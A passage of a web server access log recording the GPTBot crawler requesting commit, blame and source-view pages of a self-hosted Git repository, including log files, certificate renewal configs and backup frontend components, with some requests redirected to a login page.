192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log?display=source" [Client 74.7.227.38] [Length 123709] [Gzip 13.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 9850] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:16:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 9846] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:16:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 11182] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:16:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 9849] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:16:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 11183] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:16:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 11133] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:16:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 9841] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:16:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 11178] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:16:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 9849] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:16:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 11182] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:16:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11767] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" +[17/Feb/2026:16:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11768] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" +[17/Feb/2026:16:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm" [Client 74.7.227.38] [Length 64151] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" +[17/Feb/2026:16:46:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:16:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:16:46:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:16:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:16:46:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:16:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:16:46:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:16:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:16:46:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:16:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:16:46:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:16:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:16:46:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:16:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:16:46:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:16:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:16:46:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:16:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:16:46:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:16:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:16:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest" [Client 74.7.227.38] [Length 42872] [Gzip 9.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest" +[17/Feb/2026:16:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" +[17/Feb/2026:16:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12774] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" +[17/Feb/2026:16:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" +[17/Feb/2026:16:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11946] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" +[17/Feb/2026:16:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" +[17/Feb/2026:16:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" +[17/Feb/2026:16:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11507] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" +[17/Feb/2026:16:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11483] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" +[17/Feb/2026:16:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13976] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" +[17/Feb/2026:16:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16520] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16521] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15596] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13977] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" +[17/Feb/2026:16:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" +[17/Feb/2026:16:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15596] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14866] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14256] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14867] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" +[17/Feb/2026:16:46:25 +0000] - 200 200 - GET 